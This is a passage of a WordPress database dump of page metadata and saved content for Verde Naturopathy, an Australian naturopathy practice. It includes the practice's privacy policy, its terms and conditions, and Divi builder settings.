#site_title'),(647,424,'_aioseo_description','#post_content'),(648,424,'_aioseo_keywords',''),(649,424,'_aioseo_og_title',NULL),(650,424,'_aioseo_og_description',NULL),(651,424,'_aioseo_og_article_section',NULL),(652,424,'_aioseo_og_article_tags',''),(653,424,'_aioseo_twitter_title',NULL),(654,424,'_aioseo_twitter_description',NULL),(655,424,'_et_pb_post_hide_nav','default'),(656,424,'_et_pb_page_layout','et_no_sidebar'),(657,424,'_et_pb_side_nav','off'),(658,427,'_menu_item_type','post_type'),(659,427,'_menu_item_menu_item_parent','0'),(660,427,'_menu_item_object_id','424'),(661,427,'_menu_item_object','page'),(662,427,'_menu_item_target',''),(663,427,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(664,427,'_menu_item_xfn',''),(665,427,'_menu_item_url',''),(666,427,'_menu_item_orphaned','1743508572'),(667,428,'_menu_item_type','post_type'),(668,428,'_menu_item_menu_item_parent','0'),(669,428,'_menu_item_object_id','26'),(670,428,'_menu_item_object','page'),(671,428,'_menu_item_target',''),(672,428,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(673,428,'_menu_item_xfn',''),(674,428,'_menu_item_url',''),(689,428,'_menu_sgpb_popup_id','0'),(676,29,'_wp_old_date','2021-05-30'),(686,29,'_menu_sgpb_popup_id','0'),(678,30,'_wp_old_date','2021-05-30'),(687,30,'_menu_sgpb_popup_id','0'),(688,425,'_menu_sgpb_popup_id','0'),(681,292,'_wp_old_date','2021-05-30'),(690,292,'_menu_sgpb_popup_id','0'),(692,424,'_et_gb_content_width','1080'),(693,424,'_mi_skip_tracking',''),(694,424,'footnotes',''),(695,431,'footnotes',''),(703,424,'_et_pb_custom_css',''),(704,424,'_et_pb_gutter_width','3'),(705,424,'_thumbnail_id',''),(706,424,'_global_colors_info','{}'),(707,424,'_et_pb_first_image',''),(708,424,'_et_pb_truncate_post',''),(729,482,'footnotes',''),(739,505,'_wp_attached_file','2025/10/cropped-square-image.png'),(740,505,'_wp_attachment_context','site-icon'),(741,505,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:32:\"2025/10/cropped-square-image.png\";s:8:\"filesize\";i:8591;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:32:\"cropped-square-image-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4793;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:32:\"cropped-square-image-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2131;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:32:\"cropped-square-image-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6231;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:32:\"cropped-square-image-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6317;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:32:\"cropped-square-image-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8825;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:32:\"cropped-square-image-400x512.png\";s:5:\"width\";i:400;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7420;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:32:\"cropped-square-image-480x480.png\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8316;}s:13:\"site_icon-270\";a:5:{s:4:\"file\";s:32:\"cropped-square-image-270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4172;}s:13:\"site_icon-192\";a:5:{s:4:\"file\";s:32:\"cropped-square-image-192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2765;}s:13:\"site_icon-180\";a:5:{s:4:\"file\";s:32:\"cropped-square-image-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2590;}s:12:\"site_icon-32\";a:5:{s:4:\"file\";s:30:\"cropped-square-image-32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:394;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(746,511,'footnotes',''),(748,513,'footnotes',''),(749,514,'footnotes',''),(752,1669,'_et_pb_use_builder','on'),(753,1669,'_et_pb_page_layout','et_no_sidebar'),(756,28,'_et_builder_dynamic_assets_loading_attr_threshold','5'),(709,424,'_et_pb_truncate_post_date','2026-08-22 02:30:18'),(710,424,'_et_builder_version','VB|Divi|4.9.4'),(713,435,'footnotes',''),(712,434,'_et_pb_built_for_post_type','page'),(716,455,'footnotes',''),(715,437,'footnotes',''),(726,463,'footnotes',''),(365,27,'_et_pb_truncate_post_date','2026-08-18 10:59:58'),(366,27,'_et_builder_version','VB|Divi|4.9.4'),(598,373,'_wp_attached_file','2022/01/Screen-Shot-2022-01-21-at-12.20.02-pm.png'),(599,373,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:490;s:6:\"height\";i:613;s:4:\"file\";s:49:\"2022/01/Screen-Shot-2022-01-21-at-12.20.02-pm.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:49:\"Screen-Shot-2022-01-21-at-12.20.02-pm-240x300.png\";s:5:\"width\";i:240;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:49:\"Screen-Shot-2022-01-21-at-12.20.02-pm-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:49:\"Screen-Shot-2022-01-21-at-12.20.02-pm-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:49:\"Screen-Shot-2022-01-21-at-12.20.02-pm-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:49:\"Screen-Shot-2022-01-21-at-12.20.02-pm-490x382.png\";s:5:\"width\";i:490;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:49:\"Screen-Shot-2022-01-21-at-12.20.02-pm-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:49:\"Screen-Shot-2022-01-21-at-12.20.02-pm-480x600.png\";s:5:\"width\";i:480;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(367,27,'_edit_lock','1623731723:1'),(368,3,'_edit_lock','1622121886:1'),(369,3,'_et_pb_use_builder','on'),(370,3,'_et_pb_old_content','<!-- wp:heading -->\n<h2>Who we are</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>Our website address is: https://verde.desidrivers.com.au.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Comments</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>When visitors leave comments on the site we collect the data shown in the comments form, and also the visitor’s IP address and browser user agent string to help spam detection.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https://automattic.com/privacy/. After approval of your comment, your profile picture is visible to the public in the context of your comment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Media</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you upload images to the website, you should avoid uploading images with embedded location data (EXIF GPS) included. Visitors to the website can download and extract any location data from images on the website.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Cookies</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you leave a comment on our site you may opt-in to saving your name, email address and website in cookies. These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you visit our login page, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When you log in, we will also set up several cookies to save your login information and your screen display choices. Login cookies last for two days, and screen options cookies last for a year. If you select \"Remember Me\", your login will persist for two weeks. If you log out of your account, the login cookies will be removed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you edit or publish an article, an additional cookie will be saved in your browser. This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Embedded content from other websites</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>Articles on this site may include embedded content (e.g. videos, images, articles, etc.). Embedded content from other websites behaves in the exact same way as if the visitor has visited the other website.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracking your interaction with the embedded content if you have an account and are logged in to that website.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Who we share your data with</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you request a password reset, your IP address will be included in the reset email.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>How long we retain your data</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For users that register on our website (if any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username). Website administrators can also see and edit that information.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>What rights you have over your data</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you have an account on this site, or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you. This does not include any data we are obliged to keep for administrative, legal, or security purposes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Where we send your data</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>Visitor comments may be checked through an automated spam detection service.</p>\n<!-- /wp:paragraph -->'),(371,3,'_et_gb_content_width',''),(372,3,'_edit_last','1'),(373,3,'_et_pb_post_hide_nav','default'),(374,3,'_et_pb_page_layout','et_right_sidebar'),(375,3,'_et_pb_side_nav','off'),(377,3,'_et_pb_built_for_post_type','page'),(378,3,'_et_pb_ab_subjects',''),(379,3,'_et_pb_enable_shortcode_tracking',''),(380,3,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"3\" /]'),(381,3,'_et_pb_custom_css',''),(382,3,'_et_pb_gutter_width','3'),(383,3,'_thumbnail_id','0'),(384,3,'_global_colors_info','{}'),(385,3,'_et_pb_first_image',''),(386,3,'_et_pb_truncate_post','<div class=\"et_pb_section et_pb_section_1 et_section_regular\" >\n \n \n \n \n <div class=\"et_pb_row et_pb_row_1\">\n <div class=\"et_pb_column et_pb_column_4_4 et_pb_column_1 et_pb_css_mix_blend_mode_passthrough et-last-child\">\n \n \n <div class=\"et_pb_module et_pb_text et_pb_text_1 et_pb_text_align_left et_pb_bg_layout_light\">\n \n \n <div class=\"et_pb_text_inner\">PRIVACY POLICY<br />\nAt Verde Naturopathy, we are committed to protecting your privacy as a client and an online visitor to our website. We use the information we collect about you to maximize the services that we provide to you. We respect the privacy and confidentiality of the information provided by you and are bound by and adhere to the Privacy Act (1988) and Australian Privacy Principles.<br />\nINFORMATION WE COLLECT FROM YOU<br />\nIn the course of your visits to our website or use of our Naturopathic services, we may obtain the following information about you: name, company name, email address, telephone number, credit card details, billing address, geographic location, IP address, survey responses, support queries, social media comments and handles (together ‘Personal Data’). Our services are not directed to persons under 18 and we do not knowingly collect Personal Data from anyone under 18 without parent or guardian consent. If we become aware that a child under 18 has provided us with Personal Data without parent or guardian consent, we will delete that information as quickly as possible. If you are the parent or guardian of a child and you believe they have provided us with Personal Data without your consent, then please contact us. We seek to ensure that the personal information we collect about you is accurate, up-to-date, relevant and complete.To assist us with this, we encourage you to contact us if you believe that any information we hold about you is inaccurate, out of date, incomplete, irrelevant or misleading.<br />\nHOW WE USE YOUR INFORMATION<br />\nWe collect, hold, use and potentially disclose the information we collect from you for the following purposes; to maintain our business records and run our business, to contact you, for any purpose required or permitted by law, for any purpose you would otherwise reasonably expect, for any purpose disclosed to you and to which you have consented, to provide you with any technical support, to notify you of any updates and offers, to share useful content, to help us measure customer satisfaction, and to provide you with a personalised website experience.<br />\nMarketing communications are only sent to you if you have requested or subscribed to them. You can opt out of our marketing communications at any time by unsubscribing or emailing us – your request will be actioned immediately.<br />\nAny information you choose to make publicly available, such as blog comments will be available for others to see. If you subsequently remove this information, copies may remain viewable in cached and archived pages on other websites or if others have copied or saved the information.<br />\nSTORAGE AND SECURITY OF YOUR INFORMATION<br />\nWe will use all reasonable means to protect the confidentiality of your Personal Data while in our possession or control. All information we receive from you is stored and protected on our secure servers from unauthorized use or access. We hold your personal information in both paper-based and electronic files, in both cases stored securely. We seek to ensure that your personal information is protected from misuse, interference and loss; and unauthorised access, modification and disclosure. The personal information that we hold is treated as confidential and only accessed when necessary.<br />\nWe retain your personal information for as long as needed to provide services to you and as otherwise necessary to comply with our legal obligations, resolve disputes and enforce our agreements. In the event there is a breach of our security and your Personal Data is compromised, we will promptly notify you in compliance with the applicable law. <br />\nSHARING YOUR INFORMATION WITH THIRD PARTIES<br />\nWe do not and will not sell or deal any Personal Data or any customer information.<br />\nYour Personal Data details are only disclosed to third party suppliers when it is required by law, for goods or services which you have purchased, for payment processing or to protect our copyright, trademarks and other legal rights. To the extent that we do share your Personal Data with a service provider, we would only do so if that party has agreed to comply with our privacy standards as described in this privacy policy and in accordance with applicable law. Our contracts with third parties prohibit them from using any of your Personal Data for any purpose other than that for which it was shared. <br />\nDISCLOSURE OF YOUR INFORMATION<br />\nWe may from time to time need to disclose certain information, which may include your Personal Data, to comply with a legal requirement, such as a law, regulation, court order, subpoena, warrant, in the course of a legal proceeding or in response to a law enforcement agency request. Also, we may use your Personal Data to protect the rights, property or safety of Verde Naturopathy, our customers or third parties. If there is a change of control in one of our businesses (whether by merger, sale, transfer of assets or otherwise) customer information, which may include your Personal Data, could be transferred to a purchaser under a confidentiality agreement. We would only disclose your Personal Data in good faith and where required by any of the above circumstances. <br />\nFrom time to time, we may also disclose your Personal Data to others involved in your health care, including doctors and specialists outside Verde Naturopathy, who may be involved in treating you, pathology services, radiology services and in emergency situations. This may occur through referral to other doctors or specialists, or for medical tests and in the reports or results returned to us following the referrals. This will always be in accordance with your consent.<br />\nTypically, we only transfer your personal information overseas with your consent. The country in which the recipient is located is therefore determined by your consent.<br />\nLINKS TO OTHER WEBSITES<br />\nThis website may contain links to other websites. These links are meant for your convenience only. Links to third party websites do not constitute sponsorship or endorsement or approval of these websites. Please be aware that we are not responsible for the privacy practices of such other websites. We encourage our users to be aware, when they leave our website, to read the privacy statements of each and every website that collects personally identifiable information. This privacy policy applies solely to information collected by this website.<br />\nCHANGE IN PRIVACY POLICY<br />\nAs we plan to ensure our privacy policy remains current, this policy is subject to change. We may modify this policy at any time, in our sole discretion and all modifications will be effective immediately upon our posting of the modifications on this website. Please return periodically to review our privacy policy.<br />\nCONTACT US<br />\nIf you have any questions or concerns at any time about our privacy policy or the use of your Personal Data, please contact us at hello@verdenaturopathy.com.au <br />\nPERSONAL AND HEALTH INFORMATION COLLECTION STATEMENT <br />\nVerde Naturopathy (“us”, “we”, “our”) only collect the information we need in order to perform our services (“Services”). We comply at all times with the Australian Privacy law which regulates how personal information is handled including all your health details which are considered sensitive information (‘Personal Sensitive Information’). We will not disclose your Personal Sensitive Information without your consent unless required due to a medical emergency, injury, health risk or similar and we will only do so to a qualified professional who is under the same duty of confidentiality. You may contact us by writing to Melissa Cann, hello@verdenaturopathy.com.au and you have the right to gain access to the information held by Verde Naturopathy about you. Our Privacy Policy on our website contains information on how you may request access to, and correction of, any of the information we hold about you including your Personal Sensitive Information and how you may complain about a breach of your privacy as well as how we will deal with a complaint. By providing us with this Personal Sensitive Information, you acknowledge and agree that the information you are providing to us is true and correct at the time you are providing it to us. You will notify us with any changes and keep it updated on a regular basis while you are using our Services. You can access your Personal Sensitive Information by request at any time. We keep your Personal Sensitive Information secure and do not use it for any purposes unrelated to our Services. From time to time, we may use your Personal Sensitive Information to contact you in relation to information on our Services. You can unsubscribe at any time or advise us that you withdraw your consent to these specific uses and be removed from any further marketing or information we may send.<br />\nImportant Note: Our Services are not a substitute for medical doctor attention, treatment, examination, advice or diagnosis. You are responsible for consulting a medical doctor before commencing any new regimes or alterations to your health. You take full responsibility for making the informed decision to use our Services. You hereby agree to irrevocably release and waive any claims you may have now or in the future against us.<br />\nUpdated May 2021<br />\n <br />\n <br />\n </div>\n </div> <!-- .et_pb_text -->\n </div> <!-- .et_pb_column -->\n \n \n </div> <!-- .et_pb_row -->\n \n \n </div> <!-- .et_pb_section -->\n'),(387,3,'_et_pb_truncate_post_date','2024-02-15 05:01:03'),(388,3,'_et_builder_version','VB|Divi|4.9.4'),(389,3,'_et_pb_show_page_creation','off'),(398,26,'_edit_lock','1622011718:1'),(399,2,'_edit_lock','1622011791:1'),(400,2,'_et_pb_use_builder','on'),(401,2,'_et_pb_old_content','<!-- wp:paragraph -->\n<p>This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p>Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my website. I live in Los Angeles, have a great dog named Jack, and I like piña coladas. (And gettin\' caught in the rain.)</p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p>...or something like this:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p>As a new WordPress user, you should go to <a href=\"https://verde.desidrivers.com.au/wp-admin/\">your dashboard</a> to delete this page and create new pages for your content. Have fun!</p>\n<!-- /wp:paragraph -->'),(402,2,'_et_gb_content_width',''),(403,2,'_edit_last','1'),(404,2,'_et_pb_post_hide_nav','default'),(405,2,'_et_pb_page_layout','et_right_sidebar'),(406,2,'_et_pb_side_nav','off'),(408,2,'_et_pb_built_for_post_type','page'),(409,2,'_et_pb_ab_subjects',''),(410,2,'_et_pb_enable_shortcode_tracking',''),(411,2,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"2\" /]'),(412,2,'_et_pb_custom_css',''),(413,2,'_et_pb_gutter_width','3'),(414,2,'_thumbnail_id','0'),(415,2,'_global_colors_info','{}'),(416,2,'_et_pb_first_image',''),(417,2,'_et_pb_truncate_post','<div class=\"et_pb_section et_pb_section_0 et_section_regular\" >\n \n \n \n \n <div class=\"et_pb_row et_pb_row_0\">\n <div class=\"et_pb_column et_pb_column_4_4 et_pb_column_0 et_pb_css_mix_blend_mode_passthrough et-last-child\">\n \n \n <div class=\"et_pb_module et_pb_text et_pb_text_0 et_pb_text_align_left et_pb_bg_layout_light\">\n \n \n <div class=\"et_pb_text_inner\"> Terms & Conditions<br />\n <br />\nPlease be aware that any information we provide on this website, in blogs and in downloadable resources is general advice only. This information may not apply or could potentially be harmful to people in specific circumstances, so please seek medical advice before acting on this information to ensure your own safety, particularly if you have a medical condition or take any medications. There is no professional relationship formed unless you explicitly choose to work with us by purchasing our services or products.<br />\nYour health and safety are important to us. We expect you to use common sense when accessing the information on or downloaded from this website. Please contact us if you have any doubts or questions about the suitability of any general, nutritional, herbal or lifestyle advice provided on this website.<br />\n <br />\nOur Responsibility<br />\nMelissa Cann is a fully-qualified naturopath holding a Bachelor’s degree in Health Science (Naturopathy). This allows her to provide naturopathic services and dispense practitioner-only products. Naturopaths provide consultations which include thorough case-taking, physical examinations and the dispensing of products. Treatment plans may include natural remedies such as liquid herbs, flower essences, herbal infusions/teas, herbal creams and supplements, as well as dietary advice and meal planning, and lifestyle recommendations.<br />\n <br />\nYour responsibility<br />\nYour health & safety is our priority & therefore we ask that you fill out a Client Intake Form prior to treatment. All information you provide will be confidential. Failure to complete this form will result in our inability to treat you in the interest of your health & safety. The information gathered during a medical history will assist in establishing this and developing the best treatment plan for you. <br />\nDuring a consult, we will discuss your presenting complaint and health history in order to make the safest and most effective treatment plan for you. To get a thorough picture, we require lots of information regarding symptoms, illnesses, body systems and processes, mental health, current living situation and family history. Current medications and supplements must be disclosed so as to ensure no interactions will occur between what we prescribe and what you are currently taking.<br />\nIt is your responsibility to inform us of any changes in your health status throughout your future treatments with us.<br />\nPlease notify us immediately if you experience any worsening of symptoms or any unpleasant or unwanted side effects or reactions after commencing each new or recurring herbal medicine liquid, supplement or other treatment. Reactions may indicate a sensitivity or allergy to a herb so it is your responsibility to notify us immediately so we can rectify the issue. If a severe reaction occurs, please cease taking the prescribed remedy and seek medical advice immediately.<br />\nIf you feel you have not provided accurate information during the consult, please contact us directly to rectify. Incorrect personal/health information provided may impact your treatment success and/or personal safety.<br />\nIt is important you do not take any other supplements during the course of our treatment without first disclosing to us; this is to ensure no interactions will occur.<br />\n <br />\nPayment Terms<br />\nPayment for face-to-face consults is required at the completion of the appointment.<br />\nPayment for online consults is required at the time of booking through online payment system Stripe. Should you need to cancel your booking, the full consult fee will be refunded if more than 24 hours’ notice is provided. If you cancel with less than 24 hours notice, 50% of the consult fee will be taken and the remainder refunded to you. No-show online consults will forfeit their full consult fee.<br />\nPayments are taken via Stripe or Paypal. Please view their websites directly for their respective privacy policies.<br />\n <br />\nShipping<br />\nOnline consults: Shipping for personalised herbal tinctures, flower essences, teas and creams that we personally make up for you, will be free of charge when prescribed through a consult. If any repeats of herbal tinctures, flower essences, teas and creams that we personally make up for you are sold without a consult, you will be liable for shipping costs.<br />\nA flat-rate shipping fee of $10 is charged. Alternatively, you may wish to pick up your prescription from Kalamunda free of charge.<br />\nAll consults: If a prescription is generated for you through online dispensary vital.ly (www.vital.ly), postage will be set at their prices, which can range from $6.90 to $12.50. Please refer to vital.ly delivery terms and prices directly on their site. If you have any questions regarding this, please contact us.<br />\n <br />\nOrder fulfilment through vital.ly<br />\nOften, products will be out of stock through the online dispensary service that we use. If this occurs, please contact us and we will endeavour to find a suitable replacement product.<br />\n <br />\nOnline Consultations<br />\nOnline consults will be conducted securely via Cliniko Telehealth – please read through this info BEFORE your scheduled appointment time to ensure our consult runs smoothly. You will receive an appointment link shortly after booking. You will also receive a Client Intake form that will need to be completed at least 48hrs before the appointment.On the day of the appointment, click the Telehealth link 10-15 minutes before the start time to make sure your computer can access the link correctly and your microphone and video are in good working order.For privacy reasons, the consult will not be recorded, and we ask that you not record it either. Please ensure you are in a quiet place with minimal interruptions to allow the consult to flow freely. If internet issues causes the consult to cut out, we will continue our consultation via phone call. Any time delay between contact will be added on to the total consult time so there is no loss of time.<br />\n <br />\nChange of mind<br />\nWe do not offer a refund for change of mind for any services so please choose carefully. Please note that in order to provide safe and effective remedy prescriptions, we do not accept any product returns for refund as we cannot ascertain how the product was stored.<br />\n <br />\nCancellations and Reschedules<br />\nPlease respect our time and other clients who may wish to book your time slot by cancelling or rescheduling your appointment 24 hours or more in advance where possible. You will be sent a reminder text or email the day before your appointment to assist in the smooth running of the practice schedule.<br />\nClients are able to cancel or reschedule an appointment at anytime, without incurring a fee, provided 24 hours notice is given where practicable. This allows the opportunity to offer the session to another client. If you cancel with less than 24 hours notice, you may be charged a Late Cancellation Fee equal to 50% of the full session fee. It is important to note that third parties, (ie Worksafe) will not pay for missed appointments, so you will be responsible for the entire Late Cancellation Fee.<br />\nExtenuating circumstances may be considered and it is at the sole discretion of Verde Naturopathy whether or not to waive part or all of your booking fee as stated above.<br />\n <br />\nNo-shows<br />\nNo-shows incur a 100% cost of your appointment fee. In fairness to other clients, we deem it unreasonable to continue offering sessions to those who regularly miss or cancel their appointments at late notice and as such, after 2 unattended appointments you will be required to pay the full session fee at the time of booking to secure a new appointment.<br />\nYour understanding of this policy is appreciated.<br />\n <br />\nConfidentiality and Privacy<br />\nPlease view our privacy policy for more details.<br />\n <br />\n <br />\n <br />\n <br />\n <br />\n <br />\n <br />\n <br />\n <br />\n <br />\n </div>\n </div> <!-- .et_pb_text -->\n </div> <!-- .et_pb_column -->\n \n \n </div> <!-- .et_pb_row -->\n \n \n </div> <!-- .et_pb_section -->\n'),(418,2,'_et_pb_truncate_post_date','2024-02-15 05:01:03'),(419,2,'_et_builder_version','VB|Divi|4.9.4'),(420,2,'_et_pb_show_page_creation','off'),(762,27,'_et_builder_dynamic_assets_loading_attr_threshold','5'),(422,26,'_et_pb_use_builder','on'),(423,26,'_et_pb_show_page_creation','off'),(424,26,'_et_pb_old_content','<!-- wp:pagelayer/pl_post_props {\"post_title\":\"Contact Us\",\"post_name\":\"contact\",\"post_status\":\"publish\",\"featured_image\":\"\",\"ele_bg_hover_delay\":\"400\",\"post_excerpt\":\"\",\"pagelayer-id\":\"dhz1012\"} /-->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"custom\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_type\":\"image\",\"ele_bg_img\":\"11\",\"min_height\":\"350px\",\"ele_bg_attachment\":\"scroll\",\"ele_bg_posx\":\"center\",\"ele_bg_posy\":\"center\",\"ele_bg_repeat\":\"no-repeat\",\"ele_bg_size\":\"cover\",\"ele_margin\":\"-96px,0px,0px,0px\",\"ele_margin_tablet\":\"-87px,0px,0px,0px\",\"ele_margin_mobile\":\"-120px,0px,0px,0px\",\"pagelayer-id\":\"2de4108\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"pagelayer-id\":\"yso8850\"} -->\n<!-- wp:pagelayer/pl_post_title {\"title_color\":\"#fafafaff\",\"typo\":\",35,,700,,,Solid,,Uppercase,,\",\"align\":\"left\",\"ele_margin\":\"11em,0em,0em,0em\",\"typo_tablet\":\",25,,,,,Solid,,Uppercase,,\",\"pagelayer-id\":\"7je4490\"} /-->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->\n<!-- wp:pagelayer/pl_row 